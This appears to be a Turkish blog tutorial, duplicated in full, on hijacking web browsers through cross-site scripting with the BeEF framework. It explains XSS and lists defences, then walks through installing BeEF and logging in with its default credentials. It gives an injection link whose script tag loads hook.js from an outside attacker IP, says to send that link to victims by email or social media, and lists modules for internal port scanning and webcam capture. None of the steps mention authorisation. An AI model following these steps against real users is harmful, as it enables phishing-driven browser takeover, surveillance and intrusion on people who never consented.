XSS Kullanarak Kullanıcının Browserını Yönetme beef (beef xss die arat)
XSS, Cross-Site Scripting anlamına gelir ve web uygulamalarında yaygın bir güvenlik açığıdır. Bu açık, saldırganın kullanıcıların tarayıcılarında çalışacak kötü niyetli betikleri (script) enjekte etmesine izin veren zayıf bir kodlama veya güvenlik politikası nedeniyle ortaya çıkar.
XSS saldırıları, kullanıcının tarayıcısında çalışan betikler sayesinde oturum ele geçirme, hassas bilgi çalma, kötü yönlendirme veya web uygulama güvenliğini zayıflatma gibi potansiyel zararlar verebilir.
XSS saldırılarını önlemek için web uygulamalarının girdi doğrulaması, çıktı kodlaması, güvenlik başlıkları, güvenlik duvarları ve güvenlik testleri gibi önlemler alması gerekir.
XSS saldırılarını gerçekleştirmek için ise web uygulamalarının zayıf noktalarını tespit etmek, kötü niyetli betikleri enjekte etmek, kullanıcıları tetiklemek ve kodun çalışmasını sağlamak gibi adımlar izlenir.
BeEF, Browser Exploitation Framework kısaltmasıdır ve web tarayıcısına odaklanan bir sızma testi aracıdır. BeEF, profesyonel bir testçinin, tarayıcıda çalışan betikleri kullanarak hedef ortamın gerçek güvenlik durumunu değerlendirmesine olanak tanır.
BeEF, bir veya daha fazla web tarayıcısını ele geçirir ve onları yönlendirilmiş komut modülleri ve daha ileri saldırılar başlatmak için köprübaşı olarak kullanır.
BeEF'i kullanarak XSS saldırıları gerçekleştirmek için aşağıdaki adımları takip edebilirsiniz:
1. Adım: BeEF'i indirmek için GitHubta bulunan şu sayfayı https://github.com/beefproject/beef kullanabilirsiniz. Buradaki zip dosyasını indirerek unzip edin. Alternatif olarak, Kali Linux gibi bazı Linux dağıtımlarında sudo apt install beef-xss komutu ile de kurulum yapabilirsiniz.
2. Adım: BeEF web yönetim panelini açmak için terminalde beef-xss komutunu çalıştırın. Bu komut, BeEF servisini başlatacak ve size Web UI ve Hook adreslerini verecektir. Web UI, BeEF'in web arayüzüdür ve buradan saldırıları yönetebilirsiniz. Hook, BeEF'in ürettiği ve kurban tarayıcısında çalışacak JavaScript dosyasıdır. Web UI adresini tarayıcınızda açın ve ön tanımlı kullanıcı adı/parola ile giriş yapın (beef/beef). Bu bilgileri değiştirmek için beef-xss -h komutunu kullanabilirsiniz.
3. Adım: Sisteme giriş yaptıktan sonra, XSS açıklığı olan bir web uygulaması bulun veya oluşturun. Bu web uygulamasına, Hook adresini içeren bir link göndererek kurbanın tarayıcısını ele geçirmeye çalışın. Örneğin, http://www.example.com/sort_news?ID=<script src=http://6.6.6.121:3000/hook.js></script> gibi bir link oluşturabilirsiniz. Bu linki kurbanın tıklayacağı bir şekilde gönderin. Örneğin, e-posta, sosyal medya veya başka bir web sayfası aracılığıyla.
4. Adım: Kurban linki tıkladığında, tarayıcısında Hook dosyası çalışacak ve BeEF web arayüzünde kurbanın tarayıcısı görünecektir. Buradan kurbanın tarayıcısını yönetebilirsiniz. BeEF, kurbanın iç ağında port tarama, kurbanın kamera görüntüsü alma, kurbanın tarayıcısında ses çıkarma gibi birçok faaliyet yapmanıza olanak tanıyan çeşitli komut modülleri sunar. Bu modülleri, web arayüzündeki Commands sekmesinden seçebilir ve çalıştırabilirsiniz.
5. Adım: Örnek olarak, kurbanın tarayıcısında bir ses çıkarmak istiyorsanız, Play Sound modülünü seçebilir ve bir ses dosyasının URL'sini girebilirsiniz. Bu ses dosyası, kurbanın tarayıcısında oynatılacaktır. Ses dosyası olarak, güncel bir müzik parçası veya ilginç bir ses efekti kullanabilirsiniz. Örneğin, https://www.soundjay.com/button/beep-01a.wav gibi bir URL girebilirsiniz.
XSS, Cross-Site Scripting anlamına gelir ve web uygulamalarında yaygın bir güvenlik açığıdır. Bu açık, saldırganın kullanıcıların tarayıcılarında çalışacak kötü niyetli betikleri (script) enjekte etmesine izin veren zayıf bir kodlama veya güvenlik politikası nedeniyle ortaya çıkar.
XSS saldırıları, kullanıcının tarayıcısında çalışan betikler sayesinde oturum ele geçirme, hassas bilgi çalma, kötü yönlendirme veya web uygulama güvenliğini zayıflatma gibi potansiyel zararlar verebilir.
XSS saldırılarını önlemek için web uygulamalarının girdi doğrulaması, çıktı kodlaması, güvenlik başlıkları, güvenlik duvarları ve güvenlik testleri gibi önlemler alması gerekir.
XSS saldırılarını gerçekleştirmek için ise web uygulamalarının zayıf noktalarını tespit etmek, kötü niyetli betikleri enjekte etmek, kullanıcıları tetiklemek ve kodun çalışmasını sağlamak gibi adımlar izlenir.
BeEF, Browser Exploitation Framework kısaltmasıdır ve web tarayıcısına odaklanan bir sızma testi aracıdır. BeEF, profesyonel bir testçinin, tarayıcıda çalışan betikleri kullanarak hedef ortamın gerçek güvenlik durumunu değerlendirmesine olanak tanır.
BeEF, bir veya daha fazla web tarayıcısını ele geçirir ve onları yönlendirilmiş komut modülleri ve daha ileri saldırılar başlatmak için köprübaşı olarak kullanır.
BeEF'i kullanarak XSS saldırıları gerçekleştirmek için aşağıdaki adımları takip edebilirsiniz:
1. Adım: BeEF'i indirmek için GitHubta bulunan şu sayfayı https://github.com/beefproject/beef kullanabilirsiniz. Buradaki zip dosyasını indirerek unzip edin. Alternatif olarak, Kali Linux gibi bazı Linux dağıtımlarında sudo apt install beef-xss komutu ile de kurulum yapabilirsiniz.
2. Adım: BeEF web yönetim panelini açmak için terminalde beef-xss komutunu çalıştırın. Bu komut, BeEF servisini başlatacak ve size Web UI ve Hook adreslerini verecektir. Web UI, BeEF'in web arayüzüdür ve buradan saldırıları yönetebilirsiniz. Hook, BeEF'in ürettiği ve kurban tarayıcısında çalışacak JavaScript dosyasıdır. Web UI adresini tarayıcınızda açın ve ön tanımlı kullanıcı adı/parola ile giriş yapın (beef/beef). Bu bilgileri değiştirmek için beef-xss -h komutunu kullanabilirsiniz.
3. Adım: Sisteme giriş yaptıktan sonra, XSS açıklığı olan bir web uygulaması bulun veya oluşturun. Bu web uygulamasına, Hook adresini içeren bir link göndererek kurbanın tarayıcısını ele geçirmeye çalışın. Örneğin, http://www.example.com/sort_news?ID=<script src=http://6.6.6.121:3000/hook.js></script> gibi bir link oluşturabilirsiniz. Bu linki kurbanın tıklayacağı bir şekilde gönderin. Örneğin, e-posta, sosyal medya veya başka bir web sayfası aracılığıyla.
4. Adım: Kurban linki tıkladığında, tarayıcısında Hook dosyası çalışacak ve BeEF web arayüzünde kurbanın tarayıcısı görünecektir. Buradan kurbanın tarayıcısını yönetebilirsiniz. BeEF, kurbanın iç ağında port tarama, kurbanın kamera görüntüsü alma, kurbanın tarayıcısında ses çıkarma gibi birçok faaliyet yapmanıza olanak tanıyan çeşitli komut modülleri sunar. Bu modülleri, web arayüzündeki Commands sekmesinden seçebilir ve çalıştırabilirsiniz.
5. Adım: Örnek olarak, kurbanın tarayıcısında bir ses çıkarmak istiyorsanız, Play Sound modülünü seçebilir ve bir ses dosyasının URL'sini girebilirsiniz. Bu ses dosyası, kurbanın tarayıcısında oynatılacaktır. Ses dosyası olarak, güncel bir müzik parçası veya ilginç bir ses efekti kullanabilirsiniz. Örneğin, https://www.soundjay.com/button/beep-01a.wav gibi bir URL girebilirsiniz.
